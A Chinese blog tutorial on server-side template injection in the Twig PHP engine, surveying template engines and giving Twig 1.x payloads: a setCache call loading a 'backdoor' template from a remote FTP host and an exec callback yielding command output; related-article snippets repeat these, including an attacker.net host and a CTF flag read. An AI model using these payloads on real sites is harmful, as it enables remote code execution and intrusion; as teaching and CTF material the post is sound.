关于Twig

最新推荐文章于 2024-02-28 16:11:22 发布
最新推荐文章于 2024-02-28 16:11:22 发布
阅读量139 收藏 1
点赞数 1
文章标签: 服务器 数据库 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aetlypdlg_ys/article/details/130521905
版权

简单介绍下Twig ssti

SSTI,即服务器端模板注入(Server-Side Template Injection)

常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。

sql注入的成因是从用户获得一个输入后,经过后端脚本语言进行数据库查询,这时我们就可以构造输入语句来进行拼接,从而实现我们想要的sql语句

SSTI也是如此,不过SSTI是在服务端接收了输入后,将其作为web应用模板内容的一部分,在进行目标编译渲染的过程中,将恶意语句进行了拼接,因此可能造成敏感信息泄露、代码执行、getshell等问题

模板引擎

模板是一种提供给程序进行解析的一种语法,从初始数据到实际的视觉表达靠的就是这一项工作所实现的,且这种手段是同时存在于前后端的

常见的模板引擎有

1.php 常用的

Smarty

Smarty算是一种很老的PHP模板引擎了,非常的经典,使用的比较广泛

Twig

Twig是来自于Symfony的模板引擎,它非常易于安装和使用。它的操作有点像Mustache和liquid。

Blade

Blade 是 Laravel 提供的一个既简单又强大的模板引擎。

和其他流行的 PHP 模板引擎不一样,Blade 并不限制你在视图中使用原生 PHP代码。所有 Blade 视图文件都将被编译成原生的 PHP 代码并缓存起来,除非它被修改,否则不会重新编译,这就意味着 Blade基本上不会给你的应用增加任何额外负担。

2.Java 常用的

JSP

这个引擎我想应该没人不知道吧,这个应该也是我最初学习的一个模板引擎,非常的经典

FreeMarker

FreeMarker是一款模板引擎:即一种基于模板和要改变的数据,并用来生成输出文本(HTML网页、电子邮件、配置文件、源代码等)的通用工具。它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件。

Velocity

Velocity作为历史悠久的模板引擎不单单可以替代JSP作为JavaWeb的服务端网页模板引擎,而且可以作为普通文本的模板引擎来增强服务端程序文本处理能力。

3.Python 常用的

Jinja2

flask jinja2 一直是一起说的,使用非常的广泛,是我学习的第一个模板引擎

django

django 应该使用的是专属于自己的一个模板引擎,我这里姑且就叫他 django,我们都知道django 以快速开发著称,有自己好用的ORM,他的很多东西都是耦合性非常高的,你使用别的就不能发挥出 django 的特性了

tornado

tornado 也有属于自己的一套模板引擎,tornado 强调的是异步非阻塞高并发

攻击思路

找到模板是什么模板引擎,是哪个版本的,然后设法利用模板的内置方法,进行rce、getshell

  • 在Twig引擎中,我们可以通过下面方法获得一些关于当前应用的信息(虽然经常会被ban就是...)

  1. {{_self}} #指向当前应用

  2. {{_self.env}}

  3. {{dump(app)}}

  4. {{app.request.server.all|join(',')}}

 

在twig 1.x版本,存在三个全局变量

_self:引用当前模板实例

_context:引用上下文

_charset:引用当前字符集

其相对应的代码如下

protected $specialVars = [
       '_self' => '$this',
       '_context' => '$context',
       '_charset' => '$this->env->getCharset()',
  ];


在twig 1.x中,主要利用的是_self变量,它会返回当前 \Twig\Template 实例,并提供了指向 Twig_Environment 的 env 属性,这样我们就可以继续调用 Twig_Environment 中的其他方法

payload

{{_self.env.setCache("ftp://ip:port")}}{{_self.env.loadTemplate("backdoor")}}

 

通过调用setCache方法改变twig加载php的路径,在allow_url_include开启的条件下,我们就可以实现远程文件包含

在getFilter方法中存在call_user_func回调函数,通过传入参数我们可以借此调用任意函数

#getFilter
public function getFilter($name)
{
  ...
   foreach ($this->filterCallbacks as $callback) {
   if (false !== $filter = call_user_func($callback, $name)) {
     return $filter;
  }
}
 return false;
}
 
 
public function registerUndefinedFilterCallback($callable)
{
 $this->filterCallbacks[] = $callable;
}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
// Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)


但以上漏洞都只存在于1.x,在后续版本中,_self只会返回当前实例名字符串

 

寻你的声响
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1600
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
[BJDCTF2020]Cookie is so stable 1(twig模板注入
weixin_45577185的博客
09-06 322
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入
車鈊的博客
07-23 602
[BJDCTF2020]Cookie is so stable PHP-Twig模板注入 参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933 通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor
Twing模板注入 [BJDCTF2020]Cookie is so stable1
最新发布
m0_75178803的博客
02-28 485
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
2021-07-20 [BJDCTF2020]Cookie is so stable 知识点:SSTI Twig Cookie注入
m0_51326092的博客
07-20 340
** [BJDCTF2020]Cookie is so stable ** ** 前言: ** 不得不说又是膜拜众大佬的一天,题目对于萌新来说实在是难啊,只能搜寻wp加了解知识点边学边做了o(╥﹏╥)o BUU实现题目复现,尽管题目写着cookie,但是重点却不是这 ̄□ ̄||。 知识点:SSTI(Twig),cookie注入 ** 前置知识: ** 主要就是需要了解SSTI,具体解决Twig的。 附上大佬的链接,以下两篇文章都比较详细的讲了不同类型的SSTI,讲的是针不搓! 一篇文章带你理解漏洞之SSTI
twig.js:Twig模板语言的JS实现
04-28
关于 Twig.js是Twig PHP模板语言( )的纯JavaScript实现。 目标是提供一个与浏览器和服务器端JavaScript环境(例如node.js)兼容的库。 Twig.js目前正在开发中,并支持Twig模板语言的有限子集(更多内容将陆续...
Twig 快速入门
01-07
### Twig 快速入门知识点详解 #### 一、Twig 模板引擎简介 ...以上是关于 Twig 模板引擎的基本介绍及其常用功能的概述。了解这些基础知识可以帮助开发者快速上手并高效地使用 Twig 构建动态网页。
Twig book
02-21
### Twig Book:深入理解Twig模板引擎 #### 引言 《Twig Book》是一本全面介绍Twig模板引擎的书籍,该书不仅涵盖了Twig的基础知识、安装配置等基础内容,还深入探讨了Twig对于模板设计师和开发者的高级应用技巧,...
Twig模板引擎用法入门教程
10-22
- **加载器**(Loader):如`Twig_Loader_String`用于加载内存中的模板字符串,而`Twig_Loader_Filesystem`则用于从文件系统加载模板文件。 - **环境**(Environment):`Twig_Environment`是模板引擎的核心,存储...
Twig模板为例浅学一手SSTI
蚁景网安学院
12-17 1234
什么是SSTISSTI:开局一张图,姿势全靠ySSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPAT...
SSTI注入————php的SSTI
wwwwyyyrre的博客
06-04 967
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
适合小白学的基础知识—SSTI漏洞学习
Innocence_0的博客
02-12 620
适合小白学的基础知识—SSTI漏洞学习
PortSwigger 服务器端模板注入
weixin_42451330的博客
05-04 494
本文介绍PortSwigger靶场 服务器端模板注入漏洞,包括服务器端模板注入漏洞介绍、利用方式、防御方式等。如有疑问欢迎私聊。
服务器模板注入 SSTI (Server-side template injection)
angry_program的博客
08-05 2763
一、服务器模板注入 服务器模板注入(Server-side template injection)是当攻击者能够用本地的模板语法去注入一个恶意的payload,然后再服务器端执行该模板的攻击手法。 模板引擎是通过将固定模板与多变数据结合起来生成html网页的一种技术,当用户直接输入数据到模板不作任何过滤的时,可能会发生服务端模板注入攻击。这使得攻击者可以注入任何模板指令来操控服务器模板引擎,从而使整个服务器被控制。 顾名思义,服务器模板注入和SQL注入大同小异,但SSTI是发生在服务器端的,更加危险。
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 781
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1615
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
搭建一个ctf_由一道CTF赛题分析Twig SSTI利用方式
weixin_39620273的博客
11-22 616
前言在上周末刚刚结束的安恒6月赛DASCTF中,有一道web题涉及 Twig 模板注入,而两个月前的 volgactf 也涉及了同样的内容,但所使用的版本不同。本文通过CTF题的解法来分析 Twig 模板注入的利用方式Subscribe@DASCTF这是一道白盒代码审计题,给出的源码如下(作者注:本题目是基于Twig 1.x版本)phprequire_once "mail/smtp.cl...
SSTI相关总结 (smarty/twig)
桃雾雨Rain的博客
01-30 885
SSTI在用户可控的地方可能发生。 一、PHP smarty注入 smarty是php的一个模板引擎。更明确的来说,它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号: {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writ
Twig模板语言详解
该书是关于Twig模板引擎的详细指南,旨在帮助开发者和设计者更好地理解和使用这一强大的工具。Twig是一个流行的PHP模板语言,它为Web开发提供了安全、灵活的界面分离。这本书涵盖了从安装到进阶扩展,再到内部工作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值